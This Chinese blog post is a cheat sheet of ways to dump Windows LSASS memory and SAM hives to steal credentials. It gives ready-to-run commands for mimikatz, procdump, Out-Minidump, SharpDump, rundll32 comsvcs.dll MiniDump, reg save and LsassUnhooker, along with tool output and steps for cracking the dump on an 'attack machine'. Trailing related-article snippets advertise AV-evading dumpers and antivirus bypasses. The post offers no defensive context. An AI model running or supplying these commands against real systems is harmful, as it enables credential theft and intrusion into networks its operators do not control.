导出lsass内存各种方法

最新推荐文章于 2024-05-23 23:39:55 发布
最新推荐文章于 2024-05-23 23:39:55 发布
阅读量1.2k 收藏 1
点赞数 2
文章标签: 安全 go 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/132172475
版权

mimikatz

直接从lsass.exe进程的内存中导出凭据,命令如下:

mimikatz.exe log "privilege::debug" "sekurlsa::logonPasswords full" exit

procdump

项目地址 :
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

Out-Minidump.ps1

项目地址:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

在这里插入图片描述

接下来把lsass转储到自己的主机再用mimikatz抓取密码即可

看lsass.dmp文件生成的路径位置,然后把这个文件下载到攻击机上的mimikatz.exe所在的路径,在这个路径进入cmd命令行,然后执行:

mimikatz.exe "sekurlsa::minidump lsass.dmp"
# 接着执行
sekurlsa::logonpasswords

SharpDump

项目地址:
https://github.com/GhostPack/SharpDump

Dump LSASS:

C:\Temp>SharpDump.exe

[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out

[+] Dumping completed. Rename file to "debug808.gz" to decompress.

[*] Operating System : Windows 10 Enterprise N
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

使用comsvcs.dll

使用 rundll32找到机器的comsvcs.dll,之后以powershell(管理员)运行以下命令

# 查看lsass pid
Get-Process lsass
# 语句
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full
# 执行
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\test\lsass.dmp full

在这里插入图片描述

注册表导出sam文件

system文件位置:C:\Windows\System32\config\SYSTEM
SAM文件位置:C:\Windows\System32\config\SAM

reg save HKLM\SYSTEM C:\system.hiv 

reg save HKLM\sam C:\sam.hiv

在这里插入图片描述

之后使用mimikatz对导出的sam文件进行解密

lsadump::sam /sam:C:\sam.hiv /system:C:\system.hiv

在这里插入图片描述

LsassUnhooker

https://github.com/roberreigada/LsassUnhooker
管理员权限运行编译后的LsassUnhooker ,就会在当前目录将lsass保存为 lsass.dmp

运行 mimikatz.exe 
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

在这里插入图片描述

yr678
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
dumper2020:又一个 LSASS 倾销者
05-31
自卸车2020概括LSASS 内存转储程序的另一个概念验证。 这个结合了既定的技术,并试图在转储 LSASS 之前中和所有用户级 API 钩子。信用/感谢Dumper2020 几乎完全依赖于其他人的工作,我非常感谢他们: - Syscall 宏是...
[HACK学习呀] - 2020-06-11 绕过卡巴进程保护的一些总结1
08-03
- 通过GitHub上的开源代码,尝试编写一个DLL,将它注入到lsass.exe进程中,使lsass.exe自己导出内存文件。 - 编译过程中可能遇到错误,需要设置Visual Studio为多字节字符集,并链接rpcrt4.lib库。 文章还推荐了...
利用mimikatz抓取密码及散列值
Zlirving_的博客
01-15 1623
目录windows系统散列值获取前提介绍在线读取散列值及明文密码离线读取lsass.dmp文件防范 windows系统散列值获取 域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法) LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐 NTLM HASH:MD4加密。 前提介绍 抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略. 工具: Mimikatz Procd
c++封装exe_渗透基础——从lsass.exe进程导出凭据
weixin_39900437的博客
11-28 358
0x00 前言本文将要结合自己的经验,介绍不同环境下从lsass.exe进程导出凭据的方法,结合利用思路,给出防御建议。 0x01 简介本文将要介绍以下内容:·从lsass.exe进程导出凭据的常用方法。·限制上传文件长度时导出凭据的方法。· 限制下载文件长度时导出凭据的方法。 0x02 从lsass.exe进程导出凭据的常用方法1.使用mimikatz直接导出凭据直接从lsass...
Hidedump:dumplsass加密免杀工具
最新发布
记录学习,一起进步
05-23 1107
dumplsass
ATT&CK-T1003-001-操作系统凭据转储:LSASS内存
swordheart的博客
12-07 946
攻击者可能会尝试访问存储在本地安全机构子系统服务 (LSASS) 进程内存中的凭证材料。用户登录后,系统生成各种凭证材料,存储在LSASS进程内存中。这些凭证材料可以由管理用户或 SYSTEM 获取,并用于使用使用备用身份验证材料 进行横向移动 。与内存技术一样,LSASS 进程内存可以从目标主机转储并在本地系统上进行分析。例如,在目标主机上使用 procdump: 在本地,可以使用以下方式运行 mimikatz: 也可以使用内置的 Windows 工具,例如 comsvcs.dll: W
Windows获取密码及hash
LuckySec
05-04 3342
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
windows抓取用户密码
ATpiu的博客
07-14 3913
前言 windows环境下,一般推荐用procdump配合mimikatz来读取密码。 使用procdump的原因是微软官方的,不容易出问题。 条件 已获得当前windows管理员权限 管理员登录过该系统,且当前系统运行着lsass.exe进程 利用 从https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载procdump。 使用管理员权限运行cmd,切换到procdump所在目录,运行procdump64.exe -ac
密码破解文档
08-24
总体而言,使用Gina的方法最为稳定和安全,因为它不直接篡改系统核心组件,而直接搜索Lsass内存虽然困难,但成功率较低。文中提供的代码展示了基本的搜索方法,尽管原始且效率不高,但为理解密码破解原理提供了参考...
[后渗透]Mimikatz使用大全1
08-03
- **Procdump配合Mimikatz**: 当无法直接在主机上运行Mimikatz时,可以使用Procdump导出lsass.exe进程的内存转储文件,然后在本地分析。 - 首先,使用Procdump命令:`procdump64.exe -accepteula -ma lsass.exe ...
Python-pypykatz是Mimikatz的纯Python实现
08-12
3. **高级用法**:对于更复杂的操作,如读取远程机器的LSASS内存,可以使用`live.remote()`方法,并指定目标主机的IP地址和端口。 **四、安全与法律问题** 虽然pypykatz和Mimikatz是用于安全测试和漏洞评估的强大...
深挖 Rundll32.exe 的多种“滥用方式”以及其“特别”之处。
【Rainbow Network Technology co., LTD】
08-08 1217
在这篇文章中,我们将深挖 Rundll32.exe 的多种利用方法与其特别之处,以期对其有所了解。
mimikatz+ProcDump离线读取win2008及以下用户密码
q996966912的博客
09-01 696
win2008读取普通用户密码
mimikatz的使用
热门推荐
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
几种免杀转储lsass进程的技巧
chenfeng857的博客
09-06 3092
在内网渗透进行横向移动和权限提升时,最常用的方法是通过dump进程lsass.exe,从中获得明文口令或者hash。lsass.exe(Local Security Authority Subsystem Service)是一个系统进程,用于微软Windows系统的安全机制,它用于本地安全和登陆策略。在进程空间中,存有着机器的域、本地用户名和密码等重要信息。但是需要首先获得一个高的权限才能对其进行访问。 在存在杀软防护的情况下,要想转储lsass进程,我首先想到的是procdump+Mimikatz 的方式
绕过查杀工具实现lsass转储
stars的博客
05-01 915
最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为: C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions 接下来测试一下效果,先看一下程序信息 查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。 使用火绒对程序扫描: 使用程
基于Windows 2000 Server的域控制器上的Lsass.exe进程的内存使用量
The Redemption of Sergey
01-02 5685
概要本文介绍一些 Lsass.exe 进程基本知识、配置 Lsass.exe 进程的最佳做法以及预期的内存使用量。在基于 Windows 2000 Server 产品系列的域控制器上分析 Lsass.exe 的性能和内存使用情况时,可使用本文作为指南。如果您有关于如何调整和配置服务器和域控制器以优化该引擎的问题,本文中的信息可能会很有帮助。Lsass.exe 进程负责本地安全机构域身份验证管理
凡是占用内存大,cpu高的软件都是祸害,全部删掉:
个人进步之路
06-17 4701
凡是占用内存大,cpu高的软件都是祸害: 比如wps,比如everything.不要看着我前面在写他们,最后我都会抛弃他们的. 因为他们占用内存太大,干事情来又慢得很.不如不要.还广告多. everything我说搞些排除列表,结果仍然启动时,半个小时才启动得了,这是什么软件? wps,广告太多. ...
服务器lsass占用内存_Lsass.exe进程占用大量内存
weixin_33216916的博客
02-12 4207
Lsass进程为系统进程,当发现这个进程占用了大量内存(有的占用了3G的内存),在某些内存不是很大的服务器上内存直接达到90%以上。在发现这些内存出现问题的服务器上主要出现了如下状况:1.杀毒软件扫描出同样的病毒文件。(看扫描出的病毒文件,怀疑为勒索病毒)2.系统文件lsass.exe的大小变为30.5K(原正常文件大小为30.0K)。处理方式:网上找到的处理方法找到两种,一种是打补丁(Windo...
结束lsass.exe进程可能会导致系统蓝屏崩溃并自动重启的原因
06-13
lsass.exe(Local Security Authority Subsystem Service)是Windows操作系统中的一个进程,它负责处理本地安全机制。如果结束该进程,可能会导致系统认证和安全机制出现问题,从而引发蓝屏崩溃。此外,一些恶意软件会伪装成lsass.exe进程,如果误删可能会导致系统出现问题。因此,不建议随意结束lsass.exe进程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值